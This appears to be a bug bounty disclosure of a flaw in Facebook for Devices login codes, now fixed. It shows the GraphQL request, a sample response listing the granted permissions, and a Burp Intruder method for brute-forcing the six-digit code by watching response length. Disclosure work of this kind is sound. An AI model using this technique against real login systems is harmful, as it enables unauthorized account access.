Facebook for Devices - Facebook for Devices helps you use your Facebook account to access apps and services on smart TVs, cameras, printers and other devices. You can use Facebook for Devices to log in, share and more.
The vulnerable call went to -
POST /v3.3/graphql?access_token=my_access_token
doc_id=2400531753344072&variables={"shortCode":"six_digit_code"}
And if it's a valid call, the response would be -
{"data":{"device_request_view":{"device_name":"","device_XYZ":{"user_code":"six_digit_code","scope":"read_stream,publish_stream,user_photos,friends_photos,user_status,user_videos,friends_videos","auth_status":"ok","timestamp_expire":0,"code_type":null,"nonce":""},"application":{"name":"device_name","id":"device_ID","square_logo":{"uri":"https:\/\/scontent.xx.fbcdn.net\XYZ&_nc_oc=XYZ&_nc_ad=z-m&_nc_cid=2034&_nc_ht=scontent.xx&oh=56756b40ed65cc71725fa36aad4860cb&oe=5E491F85"}}}},"extensions":{"is_final":true}}
Rate limit evaluation -
With a thread upto 50 in burp intruder it's possible to make 1k requests in just 30 seconds. The response is always the same for every request that we make and changes only for the correct code. 4001th payload will show the same response as the 1st request and 4002th payload if hits the right code, it will show a different response length. Look for responses with around 1200 bytes. Which will be the correct pin.
Timeline -
Reported - Saturday, 16 November 2019 at 10:23
Triaged - Tuesday, 19 November 2019 at 22:51
Fixed - Tuesday, 3 December 2019 at 18:12
Rewarded - Wednesday, 4 December 2019 at 07:27